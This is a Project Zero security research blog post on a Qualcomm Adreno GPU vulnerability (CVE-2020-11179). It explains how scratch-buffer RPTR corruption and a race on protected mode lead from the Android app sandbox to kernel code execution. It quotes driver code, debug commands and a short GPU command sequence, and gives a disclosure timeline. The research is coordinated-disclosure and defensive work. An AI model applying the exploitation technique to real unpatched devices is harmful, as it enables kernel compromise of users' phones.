Reading view

There are new articles available, click to refresh the page.

Attacking the Qualcomm Adreno GPU

Posted by Ben Hawkes, Project Zero


When writing an Android exploit, breaking out of the application sandbox is often a key step. There are a wide range of remote attacks that give you code execution with the privileges of an application (like the browser or a messaging application), but a sandbox escape is still required to gain full system access.


This blog post focuses on an interesting attack surface that is accessible from the Android application sandbox: the graphics processing unit (GPU) hardware. We describe an unusual vulnerability in Qualcomm's Adreno GPU, and how it could be used to achieve kernel code execution from within the Android application sandbox.


This research was built upon the work by Guang Gong (@oldfresher), who reported CVE-2019-10567 in August 2019. One year later, in early August 2020, Guang Gong released an excellent whitepaper describing CVE-2019-10567, and some other vulnerabilities that allowed full system compromise by a remote attacker. 


However in June 2020, I noticed that the patch for CVE-2019-10567 was incomplete, and worked with Qualcomm's security team and GPU engineers to fix the issue at its root cause. The patch for this new issue, CVE-2020-11179, has been released to OEM vendors for integration. It's our understanding that Qualcomm will list this publicly in their November 2020 bulletin.


Qualcomm provided the following statement:


"Providing technologies that support robust security and privacy is a priority for Qualcomm Technologies. We commend the security researchers from Google Project Zero for using industry-standard coordinated disclosure practices. Regarding the Qualcomm Adreno GPU vulnerability, we have no evidence it is currently being exploited, and Qualcomm Technologies made a fix available to OEMs in August 2020. We encourage end users to update their devices as patches become available from their carrier or device maker and to only install applications from trusted locations such as the Google Play Store."


Android Attack Surface


The Android application sandbox is an evolving combination of SELinux, seccomp BPF filters, and discretionary access control based on a unique per-application UID. The sandbox is used to limit the resources that an application has access to, and to reduce attack surface. There are a number of well-known routes that attackers use to escape the sandbox, such as: attacking other apps, attacking system services, or attacking the Linux kernel.


At a high-level, there are several different tiers of attack surface in the Android ecosystem. Here are some of the important ones:


  • Tier: Ubiquitous

Description: Issues that affect all devices in the Android ecosystem. 

Example: Core Linux kernel bugs like Dirty COW, or vulnerabilities in standard system services.


  • Tier: Chipset

Description: Issues that affect a substantial portion of the Android ecosystem, based on which type of hardware is used by various OEM vendors.

Example: Snapdragon SoC perf counter vulnerability, or Broadcom WiFi firmware stack overflow.


  • Tier: Vendor

Description: Issues that affect most or all devices from a particular Android OEM vendor

Example: Samsung kernel driver vulnerabilities


  • Tier: Device

Description: Issues that affect a particular device model from an Android OEM vendor

Example: Pixel 4 face unlock "attention aware" vulnerability


From an attacker's perspective, maintaining an Android exploit capability is a question of covering the widest possible range of the Android ecosystem in the most cost-effective way possible. Vulnerabilities in the ubiquitous tier are particularly attractive for affecting a lot of devices, but might be expensive to find and relatively short-lived compared to other tiers. The chipset tier will normally give you quite a lot of coverage with each exploit, but not as much as the ubiquitous tier. For some attack surfaces, such as baseband and WiFi attacks, the chipset tier is your primary option. The vendor and device tiers are easier to find vulnerabilities in, but require that a larger number of individual exploits are maintained.


For sandbox escapes, the GPU offers up a particularly interesting attack surface from the chipset tier. Since GPU acceleration is widely used in applications, the Android sandbox allows full access to the underlying GPU device. Furthermore, there are only two implementations of GPU hardware that are particularly popular in Android devices: ARM Mali and Qualcomm Adreno.


That means that if an attacker can find a nicely exploitable bug in these two GPU implementations, then they can effectively maintain an sandbox escape exploit capability against most of the Android ecosystem. Furthermore, since GPUs are highly complex with a significant amount of closed-source components (such as firmware/microcode), there is a good opportunity to find a reasonably powerful and long-lived vulnerability. 


Something Looks Weird


With this in mind, in late April 2020, I noticed the following commit in the Qualcomm Adreno kernel driver code:


From 0ceb2be799b30d2aea41c09f3acb0a8945dd8711 Mon Sep 17 00:00:00 2001

From: Jordan Crouse <[email protected]>

Date: Wed, 11 Sep 2019 08:32:15 -0600

Subject: [PATCH] msm: kgsl: Make the "scratch" global buffer use a random GPU address


Select a random global GPU address for the "scratch" buffer that is used

by the ringbuffer for various tasks.


When we think of adding entropy to addresses, we usually think of Address Space Layout Randomization (ASLR). But here we're talking about a GPU virtual address, not a kernel virtual address. That seems unusual, why would a GPU address need to be randomized? 


It was relatively straightforward to confirm that this commit was one of the security patches for CVE-2019-10567, which are linked in Qualcomm's advisory. A related patch was also included for this CVE:


From 8051429d4eca902df863a7ebb3c04cbec06b84b3 Mon Sep 17 00:00:00 2001

From: Jordan Crouse <[email protected]>

Date: Mon, 9 Sep 2019 10:41:36 -0600

Subject: [PATCH] msm: kgsl: Execute user profiling commands in an IB


Execute user profiling in an indirect buffer. This ensures that addresses

and values specified directly from the user don't end up in the

ringbuffer.


And so the question becomes, why exactly is it important that user content doesn't end up on the ringbuffer, and is this patch really sufficient to prevent that? And what happens if we can recover the base address of the scratch mapping? Both at least superficially looked to be possible, so this research project was off to a great start.


Before we go any further, let's take a step back and describe some of the basic components involved here: GPU, ringbuffer, scratch mapping, and so on.


Adreno Introduction


The GPU is the workhorse of modern graphics computing, and most applications use the GPU extensively. From the application's perspective, the specific implementation of GPU hardware is normally abstracted away by libraries such as OpenGL ES and Vulkan. These libraries implement a standard API for programming common GPU accelerated operations, such as texture mapping and running shaders. At a low level however, this functionality is implemented by interacting with the GPU device driver running in kernel space.




Specifically for Qualcomm Adreno, the /dev/kgsl-3d0 device file is ultimately used to implement higher level GPU functionality. The /dev/kgsl-3d0 file is directly accessible within the untrusted application sandbox, because:

  1. The device file has global read/write access set in its file permissions. The permissions are set by ueventd:


sargo:/ # cat /system/vendor/ueventd.rc | grep kgsl-3d0

/dev/kgsl-3d0             0666   system     system

  1. The device file has its SELinux label set to gpu_device, and the untrusted_app SELinux context has a specific allow rule for this label:

sargo:/ # ls -Zal /dev/kgsl-3d0

crw-rw-rw- 1 system system u:object_r:gpu_device:s0 239, 0 2020-07-21 

15:48 /dev/kgsl-3d0


[email protected]:~$ adb pull /sys/fs/selinux/policy

/sys/fs/selinux/policy: 1 file pulled, 0 skipped. 16.1 MB/s ...

[email protected]:~$ sesearch -A -s untrusted_app policy | grep gpu_device

allow untrusted_app gpu_device:chr_file { append getattr ioctl lock map

open read write };


This means that the application can open the device file. The Adreno "KGSL" kernel device driver is then primarily invoked through a number of different ioctl calls (e.g. to allocate shared memory, create a GPU context, submit GPU commands, etc.) and mmap (e.g. to map shared memory in to the userspace application).


GPU Shared Mappings


For the most part, applications use shared mappings to load vertices, fragments, and shaders into the GPU and to receive computed results. That means certain physical memory pages are shared between a userland application and the GPU hardware.  


To set up a new shared mapping, the application will ask the KGSL kernel driver for an allocation by calling the IOCTL_KGSL_GPUMEM_ALLOC ioctl. The kernel driver will prepare a region of physical memory, and then map this memory into the GPU's address space (for a particular GPU context, explained below). Finally, the application will map the shared memory into the userland address space by using an identifier returned from the allocation ioctl.


At this point, there are two distinct views on the same pages of physical memory. The first view is from the userland application, which uses a virtual address to access the memory that is mapped into its address space. The CPU's memory management unit (MMU) will perform address translation to find the appropriate physical page.


The other is the view from the GPU hardware itself, which uses a GPU virtual address. The GPU virtual address is chosen by the KGSL kernel driver, which configures the device's IOMMU (called the SMMU on ARM) with a page table structure that is used just for the GPU. When the GPU tries to read or write the shared memory mapping, the IOMMU will translate the GPU virtual address to a physical page in memory. This is similar to the address translation performed on the CPU, but with a completely different address space (i.e. the pointer value used in the application will be different to the pointer value used in the GPU).




Each userland process has its own GPU context, meaning that while a certain application is running operations on the GPU, the GPU will only be able to access mappings that it shares with that process. This is needed so that one application can't ask the GPU to read the shared mappings from another application. In practice this separation is achieved by changing which set of page tables is loaded into the IOMMU whenever a GPU context switch occurs. A GPU context switch occurs whenever the GPU is scheduled to run a command from a different process.


However certain mappings are used by all GPU contexts, and so can be present in every set of page tables. They are called global shared mappings, and are used for a variety of system and debugging functions between the GPU and the KGSL kernel driver. While they are never mapped directly into a userland application (e.g. a malicious application can't read or modify the contents of the global mappings directly), they are mapped into both the GPU and kernel address spaces.


On a rooted Android device, we can dump the global mappings (and their GPU virtual addresses) using the follow command:


sargo:/ # cat /sys/kernel/debug/kgsl/globals

0x00000000fc000000-0x00000000fc000fff             4096 setstate

0x00000000fc001000-0x00000000fc040fff           262144 gpu-qdss

0x00000000fc041000-0x00000000fc048fff            32768 memstore

0x00000000fce7a000-0x00000000fce7afff             4096 scratch

0x00000000fc049000-0x00000000fc049fff             4096 pagetable_desc

0x00000000fc04a000-0x00000000fc04afff             4096 profile_desc

0x00000000fc04b000-0x00000000fc052fff            32768 ringbuffer

0x00000000fc053000-0x00000000fc053fff             4096 pagetable_desc

0x00000000fc054000-0x00000000fc054fff             4096 profile_desc

0x00000000fc055000-0x00000000fc05cfff            32768 ringbuffer

0x00000000fc05d000-0x00000000fc05dfff             4096 pagetable_desc

0x00000000fc05e000-0x00000000fc05efff             4096 profile_desc

0x00000000fc05f000-0x00000000fc066fff            32768 ringbuffer

0x00000000fc067000-0x00000000fc067fff             4096 pagetable_desc

0x00000000fc068000-0x00000000fc068fff             4096 profile_desc

0x00000000fc069000-0x00000000fc070fff            32768 ringbuffer

0x00000000fc071000-0x00000000fc0a0fff           196608 profile

0x00000000fc0a1000-0x00000000fc0a8fff            32768 ucode

0x00000000fc0a9000-0x00000000fc0abfff            12288 capturescript

0x00000000fc0ac000-0x00000000fc116fff           438272 capturescript_regs

0x00000000fc117000-0x00000000fc117fff             4096 powerup_register_list

0x00000000fc118000-0x00000000fc118fff             4096 alwayson

0x00000000fc119000-0x00000000fc119fff             4096 preemption_counters

0x00000000fc11a000-0x00000000fc329fff          2162688 preemption_desc

0x00000000fc32a000-0x00000000fc32afff             4096 perfcounter_save_restore_desc

0x00000000fc32b000-0x00000000fc53afff          2162688 preemption_desc

0x00000000fc53b000-0x00000000fc53bfff             4096 perfcounter_save_restore_desc

0x00000000fc53c000-0x00000000fc74bfff          2162688 preemption_desc

0x00000000fc74c000-0x00000000fc74cfff             4096 perfcounter_save_restore_desc

0x00000000fc74d000-0x00000000fc95cfff          2162688 preemption_desc

0x00000000fc95d000-0x00000000fc95dfff             4096 perfcounter_save_restore_desc

0x00000000fc95e000-0x00000000fc95efff             4096 smmu_info


And suddenly our scratch buffer has appeared! To the left we see the GPU virtual addresses of each global mapping, then a size, and then the name of the allocation. By rebooting the device several times and checking the layout, we can see that the scratch buffer is indeed randomized:


0x00000000fc0df000-0x00000000fc0dffff             4096 scratch

...

0x00000000fcfc0000-0x00000000fcfc0fff             4096 scratch

...

0x00000000fc9ff000-0x00000000fc9fffff             4096 scratch

...

0x00000000fcb4d000-0x00000000fcb4dfff             4096 scratch


The same test reveals that the scratch buffer is the only global mapping that is randomized, all other global mappings have a fixed GPU address in the range [0xFC000000, 0xFD400000]. That makes sense, because the patch for CVE-2019-10567 only introduced the KGSL_MEMDESC_RANDOM flag for the scratch buffer allocation. 


So we now know that the scratch buffer is correctly randomized (at least to some extent), and that it is a global shared mapping present in every GPU context. But what exactly is the scratch buffer used for?


The Scratch Buffer


Diving in to the driver code, we can clearly see the scratch buffer being allocated in the driver's probe routines, meaning that the scratch buffer will be allocated when the device is first initialized:


int adreno_ringbuffer_probe(struct adreno_device *adreno_dev, bool nopreempt)

{

...

status = kgsl_allocate_global(device, &device->scratch,

                            PAGE_SIZE, 0, KGSL_MEMDESC_RANDOM, "scratch");


We also find this useful comment:


 /* SCRATCH MEMORY: The scratch memory is one page worth of data that

 *  is mapped into the GPU. This allows for some 'shared' data between

 *  the GPU and CPU. For example, it will be used by the GPU to write

 *  each updated RPTR for each RB.


By cross referencing all the usages of the resulting memory descriptor (device->scratch) in the kernel driver, we can find two primary usages of the scratch buffer:


  1. The GPU address of a preemption restore buffer is dumped to the scratch memory, which appears to be used if a higher priority GPU command interrupts a lower priority command.

  2. The read pointer (RPTR) of the ringbuffer (RB) is read from scratch memory and used when calculating the amount of free space in the ringbuffer.


Here we can start to connect the dots. Firstly, we know that the patch for CVE-2019-10567 included changes to both the scratch buffer and the ringbuffer handling code -- that suggests we should focus on the second use case above. 


If the GPU is writing RPTR values to the shared mapping (as the comment suggests), and if the kernel driver is reading RPTR values from the scratch buffer and using it for allocation size calculations, then what happens if we can make the GPU write an invalid or incorrect RPTR value?


Ringbuffer Basics


To understand what an invalid RPTR value might mean for a ringbuffer allocation, we first need to describe the ringbuffer itself. When a userland application submits a GPU command (IOCTL_KGSL_GPU_COMMAND), the driver code dispatches the command to the GPU via the ringbuffer, which uses a producer-consumer pattern. The kernel driver will write commands into the ringbuffer, and the GPU will read commands from the ringbuffer.


This occurs in a similar fashion to classical circular buffers. At a low level, the ringbuffer is a global shared mapping with a fixed size of 32768 bytes. Two indices are maintained to track where the CPU is writing to (WPTR), and where the GPU is reading from (RPTR). To allocate space on the ringbuffer, the CPU has to calculate whether there is sufficient room between the current WPTR and the current RPTR. This happens in adreno_ringbuffer_allocspace:


unsigned int *adreno_ringbuffer_allocspace(struct adreno_ringbuffer *rb,

                unsigned int dwords)

{

        struct adreno_device *adreno_dev = ADRENO_RB_DEVICE(rb);

        unsigned int rptr = adreno_get_rptr(rb); [1]

        unsigned int ret;


        if (rptr <= rb->_wptr) { [2]

                unsigned int *cmds;


                if (rb->_wptr + dwords <= (KGSL_RB_DWORDS - 2)) {

                        ret = rb->_wptr;

                        rb->_wptr = (rb->_wptr + dwords) % KGSL_RB_DWORDS;

                        return RB_HOSTPTR(rb, ret);

                }

                

                /* 

                 * There isn't enough space toward the end of ringbuffer. So

                 * look for space from the beginning of ringbuffer upto the

                 * read pointer.

                 */

                if (dwords < rptr) {

                        cmds = RB_HOSTPTR(rb, rb->_wptr);

                        *cmds = cp_packet(adreno_dev, CP_NOP,

                                KGSL_RB_DWORDS - rb->_wptr - 1);

                        rb->_wptr = dwords;

                        return RB_HOSTPTR(rb, 0);

                }

        }


        if (rb->_wptr + dwords < rptr) { [3]

                ret = rb->_wptr;

                rb->_wptr = (rb->_wptr + dwords) % KGSL_RB_DWORDS;

                return RB_HOSTPTR(rb, ret); [4]

        }


        return ERR_PTR(-ENOSPC);

}


unsigned int adreno_get_rptr(struct adreno_ringbuffer *rb)

{

        struct adreno_device *adreno_dev = ADRENO_RB_DEVICE(rb);

        unsigned int rptr = 0;

...

                struct kgsl_device *device = KGSL_DEVICE(adreno_dev);


                kgsl_sharedmem_readl(&device->scratch, &rptr,

                                SCRATCH_RPTR_OFFSET(rb->id)); [5]

...

        return rptr;

}


We can see the RPTR value being read at [1], and that it ultimately comes from a read of the scratch global shared mapping at [5]. Then we can see the scratch RPTR value being used in two comparisons with the WPTR value at [2] and [3]. The first comparison is for the case where the scratch RPTR is less than or equal to WPTR, meaning that there may be free space toward the end of the ringbuffer or at the beginning of the ringbuffer. The second comparison is for the case where the scratch RPTR is higher than the WPTR. If there's enough room between the WPTR and scratch RPTR, then we can use that space for an allocation.


So what happens if the scratch RPTR value is controlled by an attacker? In that case, the attacker could make either one of these conditions succeed, even if there isn't actually space in the ringbuffer for the requested allocation size. For example, we can make the condition at [3] succeed when it normally wouldn't by artificially increasing the value of the scratch RPTR, which at [4] results in returning a portion of the ringbuffer that overlaps the correct RPTR location. 


That means that an attacker could overwrite ringbuffer commands that haven't yet been processed by the GPU with incoming GPU commands! Or in other words, controlling the scratch RPTR value could desynchronize the CPU and GPU's understanding of the ringbuffer layout. That sounds like it could be very useful! But how can we overwrite the scratch RPTR value?


Attacking the Scratch RPTR Value


Since global shared mappings are not mapped into userland, an attacker cannot modify the scratch buffer directly from their malicious/compromised userland process. However we know that the scratch buffer is mapped into every GPU context, including any created by a malicious attacker. What if we could make the GPU hardware write a malicious RPTR value into the scratch buffer on our behalf?  


To achieve this, there are two fundamental steps. Firstly, we need to confirm that the mapping is writable by user-supplied GPU commands. Secondly, we need a way to recover the base GPU address of the scratch mapping. This latter step is necessary due to the recent addition of GPU address randomization for the scratch mapping.


So are all global shared mappings writable by the GPU? It turns out that not every global shared mapping can be written to by user-supplied GPU commands, but the scratch buffer can be. We can confirm this by using the sysfs debugging method above to find the randomized base of the scratch mapping, and then writing a short sequence of GPU commands to write a value to the scratch mapping:


    /* write a value to the scratch buffer at offset 256 */

    *cmds++ = cp_type7_packet(CP_MEM_WRITE, 3);

    cmds += cp_gpuaddr(cmds, SCRATCH_BASE+256);

    *cmds++ = 0x41414141;


    /* ensure that the write has taken effect */

    *cmds++ = cp_type7_packet(CP_WAIT_REG_MEM, 6);

    *cmds++ = 0x13;

    cmds += cp_gpuaddr(cmds, SCRATCH_BASE+256);

    *cmds++ = 0x41414141;

    *cmds++ = 0xffffffff;

    *cmds++ = 0x1;

    

    /* write 1 to userland shared memory to signal success */

    *cmds++ = cp_type7_packet(CP_MEM_WRITE, 3);

    cmds += cp_gpuaddr(cmds, shared_mem_gpuaddr);

    *cmds++ = 0x1;


Each CP_* operation here is constructed in userspace and run on the GPU hardware. Typically OpenGL library methods and shaders would be translated to these raw operations by a vendor supported library, but an attacker can also construct these command sequences manually by setting up some GPU shared memory and calling IOCTL_KGSL_GPU_COMMAND. These operations aren't documented however, so behavior has to be inferred by reading the driver code and manual tests. Some examples are: 1) the CP_MEM_WRITE operation writes a constant value to a GPU address, 2) the CP_WAIT_REG_MEM operation stalls execution until a GPU address contains a certain constant value, and 3) the CP_MEM_TO_MEM copies data from one GPU address to another.


That means that we can be sure that the GPU successfully wrote to the scratch buffer by checking that the final write occurs (on a normal userland shared memory mapping) -- if the scratch buffer write wasn't successful, the CP_WAIT_REG_MEM operation would time out and no value would be written back.


It's also possible to confirm that the scratch buffer is writable by looking at how the page tables for the global shared mapping are set up in the kernel driver code. Specifically, since the call to kgsl_allocate_global doesn't have KGSL_MEMFLAGS_GPUREADONLY or KGSL_MEMDESC_PRIVILEGED flags set, the resulting mapping is writable by user-supplied GPU commands.


But if the scratch buffer's base address is randomized, how do we know where to write to? There were two approaches to recovering the base address of the scratch buffer.


The first approach is to simply take the GPU command we used above to confirm that the scratch buffer was writable, and turn it into a bruteforce attack. Since we know that global shared mappings have a fixed range, and we know that only the scratch buffer is randomized, we have a very small search space to explore. Once the other static global shared mapping locations are removed from consideration, there are only 2721 possible locations for the scratch page. On average, it took 7.5 minutes to recover the scratch buffer address on a mid-range smartphone device, and this time could likely be optimized further.


The second approach was even better. As mentioned above, the scratch buffer is also used for preemption. To prepare the GPU for preemption, the kernel driver calls the a6xx_preemption_pre_ibsubmit function, which inserts a number of operations into the ringbuffer. The details of those operations aren't very important for our attack, other than the fact that a6xx_preemption_pre_ibsubmit spilled a scratch buffer pointer to the ringbuffer as an argument to a CP_MEM_WRITE operation. 


Since the ringbuffer is a global mapping and readable by user-supplied GPU commands, it was possible to immediately extract the base of the scratch mapping by using a CP_MEM_TO_MEM command at the right offset into the ringbuffer (i.e. we copied the contents of the ringbuffer to an attacker controlled userland shared mapping, and the contents contained a pointer to the randomized scratch buffer).


Overwriting the Ringbuffer


Now that we know we can reliably control the scratch RPTR value, we can turn our attention to corrupting the contents of the ringbuffer. What exactly is contained in the ringbuffer, and what does overwriting it buy us?


There are actually four different ringbuffers, each used for different GPU priorities, but we only need one for this attack, so we choose the ringbuffer that gets used the least on a modern Android device in order to avoid any noise from other applications using the GPU (ringbuffer 0, which at the time wasn't used at all by Android). Note that the ringbuffer global shared mapping uses the KGSL_MEMFLAGS_GPUREADONLY flag, so an attacker cannot directly modify the ringbuffer contents, and we need to use the scratch RPTR primitive to achieve this.


Recall that the ringbuffer is used to send commands from the CPU to the GPU. In practice however, user-supplied GPU commands are never placed directly onto the ringbuffer. This is for two reasons: 1) space in the ringbuffer is limited, and user-supplied GPU commands can be very large, and 2) the ringbuffer is readable by all GPU contexts, and so we want to ensure that one process can't read commands from a different process.


Instead, a layer of indirection occurs, and user-supplied GPU commands are run after an "indirect branch" from the ringbuffer occurs. Conceptually system level commands are executed straight from the ringbuffer, and user level commands are run after an indirect branch into GPU shared memory. Once the user commands finish, control flow will return to the next ringbuffer operation. The indirect branch is performed with a CP_INDIRECT_BUFFER_PFE operation, which is inserted into the ringbuffer by adreno_ringbuffer_submitcmd. This operation takes two parameters, the GPU address of the branch target (e.g. a GPU shared memory mapping with user-supplied commands in it) and a size value.


Aside from the indirect branch operation, the ringbuffer contains a number of other GPU command setup and teardown operations, something a bit like the prologue and epilogue of a compiled function. This includes the preemption setup mentioned earlier, GPU context switches, hooks for performance monitoring, errata fixups, identifiers, and protected mode operations. When considering we have some sort of ringbuffer corruption primitive, protected mode operations certainly sound like a potential target area, so let's explore this further.


Protected Mode


When a user-supplied GPU command is running on the GPU, it runs with protected mode enabled. This means that certain global shared mappings and certain GPU register ranges cannot be accessed (read or written). It turns out that this is critically important to the security model of the GPU architecture.


If we examine the driver code for all instances of protected mode being disabled (using the CP_SET_PROTECTED_MODE operation), we see just a handful of examples. Operations related to preemption, errata fixups, performance counters, and GPU context switches can all potentially run with protected mode disabled.


This last operation, GPU context switches, sounds particularly interesting. As a reminder, the GPU context switch occurs when two different processes are using the same ringbuffer. Since the GPU commands from one process aren't allowed to operate on the shared memory belonging to another process, the context switch is needed to switch out the page tables that the GPU has loaded.


What if we could make the GPU switch to an attacker controlled page table? Not only would our GPU commands be able to read and write shared mappings from other processes, we would be able to read and write to any physical address in memory, including kernel memory!


This is an intriguing proposition, and looking at how the kernel driver sets up the context switch operations in the ringbuffer, it looks alluringly possible. Based on a cursory review of the driver code, it looks like the GPU has an operation to switch page tables called CP_SMMU_TABLE_UPDATE. It's possible that this design was chosen for performance considerations, as it means that the GPU can perform a context switch without having to interrupt the kernel and wait for the IOMMU to be reconfigured -- it can simply reconfigure itself.


Looking further, it looks like the GPU has the IOMMU's "TTBR0" register mapped to a protected mode GPU register as well. By reading the ARM address translation and IOMMU documentation, we can see that TTBR0 is the base address of the page tables used for translating GPU addresses to physical memory addresses. That means if we can point TTBR0 to a set of malicious page tables, then we can translate any GPU address to any physical address of our choosing. 


And suddenly, we have a clear idea of how the original attack in CVE-2019-10567 worked. Recall that aside from randomizing the scratch buffer location, the patch for CVE-2019-10567 also "ensures that addresses and values specified directly from the user don't end up in the ringbuffer". 


We can now study Guang Gong's whitepaper and confirm that his attack managed to use the RPTR corruption technique (at the time using the static address of the scratch buffer) to smuggle operations into the ringbuffer via the arguments to performance profiling commands, which would then be executed due to clever alignment with the "true" RPTR value on the GPU. The smuggled operations disabled protected mode and branched to attacker controlled GPU commands, which promptly overwrote TTBR0 to gain a R/W primitive to arbitrary physical memory. Amazing!


Recovering the Attack


Since we have already bypassed the first part of the patch for CVE-2019-10567 (randomizing the scratch buffer base), to recover the attack (i.e. to be able to use a modified TTBR0 to write physical memory), we simply need to bypass the second part as well.


In essence the second part of the patch for CVE-2019-10567 prevented attacker-controlled commands from being written to the ringbuffer, particularly by the profiling subsystem. The obvious path to bypassing this fix would be to find a different way to smuggle attacker-controlled commands. While there were some exciting looking avenues (such as using the user-supplied GPU address as a command opcode), I decided to pursue a different approach.


Rather than inserting attacker controlled commands to the ringbuffer, let's use the RPTR ringbuffer corruption primitive to desynchronize and reorder legitimate ringbuffer operations. The two basic ingredients we need is an operation that disables protected mode, and an operation that calls an indirect branch -- both of which occur organically within the GPU kernel driver code.


The typical pattern for protected mode operations is to 1) drop protected mode, 2) perform some privileged operations, and 3) re-enable protected mode. Therefore, to recover the attack, we can perform a race condition between steps 1 and 3.  We can start the execution of a privileged operation such as a GPU context switch, and while it is still executing on the GPU with protected mode disabled, we can overwrite the privileged operations using the RPTR ringbuffer corruption primitive, essentially replacing the GPU context switch with an attacker-controlled indirect branch.



In order to win the race condition, we have to write an attacker controlled indirect branch to the correct offset in the ringbuffer (e.g. the offset of a context switch), and we need to time this write operation so that the GPU command processor has executed the operation to disable protected mode, but not yet executed the context switch itself. 


In practice this race condition appears to be highly feasible, and the temporal and spatial conditions are relatively stable. Specifically, by stalling the GPU with a wait command, and then synchronizing the context switch and the ringbuffer corruption primitives, we can establish a relative offset from the wait command where the GPU will first observe writes from the ringbuffer corruption. This discrete boundary likely results from caching behavior or a fixed-size internal prefetch buffer, and it makes it straightforward to calculate the correct layout of padding, payload, and context switch.


The race condition can be won at least 20% of the time, and since a failed attempt has no observable negative effects, the race condition can be repeated as many times as needed, which means that the attack can succeed almost immediately just by running the exploit in a loop. 


Once the attack succeeds, a branch to attacker supplied shared memory occurs while protected mode is disabled. This means that the TTBR0 register described above can be modified to point to an attacker controlled physical page that contains a fake page table structure. In the past (e.g. for rowhammer attacks) the setup of a known physical address has been achieved by using the ION memory allocator or spraying memory through the buddy allocator, and I found some straightforward success with the latter approach.


This allows the attacker to map a GPU address to an arbitrary physical address. At this point the attacker's GPU commands can overwrite kernel code or data structures to achieve arbitrary kernel code execution, which is straightforward since the kernel is located at a fixed physical address on Android kernels.


Final Attack


A proof-of-concept exploit called Adrenaline is available here. The proof-of-concept demonstrates the attack on a Pixel 3a device running sargo-user QQ2A.200501.001.B3 with kernel 4.9.200-gdf3ca60d978c-ab6351706. It overwrites an entry in the kernel's sys_call_table structure to show PC control.


Aside from the 20% success rate of winning the race condition discussed above, the proof-of-concept has two other areas of unreliability: 1) ringbuffer offsets aren't guaranteed to be the same across kernel versions, but should be stable once you calculate them (and could be calculated automatically), and 2) the spray technique used to allocate attacker-controlled data at a known physical address is very basic and used for demonstration purposes only, and there's a chance the chosen fixed page is already in-use. It should be possible to fix point 2 using ION or some other method. 


Patch Timeline


The reported issue was assigned CVE-2020-11179, and was patched by applying GPU firmware and kernel driver changes that enforce new restrictions on memory accesses to the scratch buffer by user-supplied GPU commands (i.e. the scratch buffer is protected while running indirect branches from the ringbuffer).



2020-06-08

Bug report sent to Qualcomm and filed Issue 2052 in the Project Zero issue tracker.

2020-06-08

Qualcomm acknowledges the report and assigns QPSIIR-1378 for tracking.

2020-06-12

Qualcomm agrees to schedule a meeting to discuss the reported issue.

2020-06-16

Project Zero and Qualcomm meet to discuss the attack and potential fixes.

2020-06-16

Additional PoC for the rptr bruteforce attack is shared with Qualcomm, as well as a potential bypass for one of the fix approaches that was discussed. Project Zero asks Qualcomm to coordinate with ecosystem partners as appropriate.

2020-06-23

Request for update regarding the potential fix bypass, fix timeline, and earlier request for coordination.

2020-06-25

Qualcomm confirms that the potential bypass can be resolved with a kernel driver patch, indicate that the patch is targeted for the August bulletin, and that Project Zero can ask Android Security to coordinate directly with Qualcomm.

2020-06-25

Project Zero informs Android Security that an issue exists and only provides a Qualcomm reference number. Project Zero asks Android Security to coordinate with Qualcomm for any further details.

2020-07-17

Qualcomm gives an update on the progress of a microcode based fix. The plan is that the fix will be available for OEMs by September 7, but Qualcomm will request an extension to patch integration and testing by OEMs.allow more time for patch integration and testing by OEMs.

2020-07-17

Project Zero responds by explaining the option and requirements for a 14-day grace period extension.

2020-07-29

Qualcomm confirms technical details of how the patch will work, and asks for a disclosure date of October 5th, and to withhold the PoC exploit if that's not possible.

2020-07-31

Project Zero reply to confirm a planned disclosure date of September 7 (based on policy). The PoC will be released on Sep 7, and that we predict a low likelihood of opportunistic reuse in the near-term due to the complexity of the exploit and additional R&D requirements for real-world usage.

2020-08-04

Qualcomm privately shares a security advisory with OEMs. OEMs can then request the fix to be applied to their branch/image.

2020-08-20

Qualcomm shares the current timeline with Project Zero, indicating that they were targeting a November public security bulletin release, and request a 14-day extension.

2020-08-25

Project Zero reiterates that a fix needs to be expected within the 14-day window for that extension option to apply.

2020-08-25

Qualcomm ask if any OEM shipping a fix within the 14-day window would be sufficient for the grace extension to be applied.

2020-08-26

Project Zero responds with a range of options for how to use the 14-day extension in cases of a complex downstream arrangement. Project Zero requests the CVE-ID for this issue.

2020-08-27

Qualcomm informs Project Zero that the CVE-ID will be CVE-2020-11179

2020-09-02

Qualcomm provides a statement for inclusion in the blogpost. Qualcomm asked to confirm the disclosure date, as the 90 day period ends on a US Public Holiday (Sep 7).

2020-09-02

Project Zero confirms that the new disclosure date is Sep 8, due to the US Public Holiday.

2020-09-08

Public disclosure (issue tracker and blog post)


Recommendations


We can offer a few additional recommendations:


  1. Transparency and openness: One of the surprising observations while performing this attack was the level of complexity and the amount of processing of untrusted data that happens on the GPU. Since the GPU is a critical part of Android's security model, increasing the level of openness to be consistent with other similarly critical components is advisable. Note that this guidance applies to both Qualcomm Adreno and ARM Mali. Practically speaking, this could include publishing any relevant design documentation and source code, while also providing a threat model/security model for the GPU device.

    More generally, the competitive benefits of a closed platform approach to hardware internals should be reassessed in 2020. This balance may have been historically appropriate when the GPU was not in the critical path for security, but today billions of users are relying on the GPU to uphold the operating system security model. 


  1. Variant analysis: It's possible that this issue could have been found and fixed earlier, based on the first report of CVE-2019-10567. The initially adopted fixes by the Adreno engineers were a clever attempt at mitigating the issue, but didn't look particularly reliable or comprehensive at first glance.

    Between Qualcomm, Android security, and the numerous OEMs that received details of both the original attack and the planned patches, I find it troubling that no one seems to have questioned the efficacy of these patches any further. Personally, I think this is because the work of the teams that triage and respond to external vulnerability reports is often undervalued and underfunded.

    When facing a barrage of external bug reports, it's hard enough to keep your head above water, let alone find the time and mental energy to pursue and understand an individual issue to the level required to find variants. But a high quality bug report is a potential gold mine of insights and ideas for improving your products' defensive posture.

    Speaking to security engineering managers now: finding ways to resource and structure your vulnerability triage team in a way that allows for individual deep dives and tangential pursuits is the best way to extract the maximum value from your external bug reports, and will certainly pay for itself in the long run (in terms of your product's security posture of course, but also in terms of your team's reputation, motivation, and ability to hire). This type of triage work is often seen as a stepping stone to something better, or as a dreaded busy-work rotation, but it doesn't need to be like that.


  1. Vulnerability Remediation: All security critical components in Android devices should be updateable within 90 days, including low-level systems like GPU firmware. For components where this is not yet the case, we disclose issues like this hoping to motivate future investments in technology, staffing, and process improvements that will bring the component in line with industry standards.

    There's a temptation to say that "hardware issues" are harder to fix, and so should receive more lenient treatment. However, this bug is best described as a software issue running on an opaque and undocumented platform. This relative obscurity has likely contributed to a lack of review, hardening, testing, and a slower vulnerability remediation process, but these challenges aren't fundamental to the technology itself. With proper investment, bugs like this can be fixed and shipped to users within 90 days. If for any reason that investment isn't possible, it's important that users are made aware of this constraint.


Conclusion


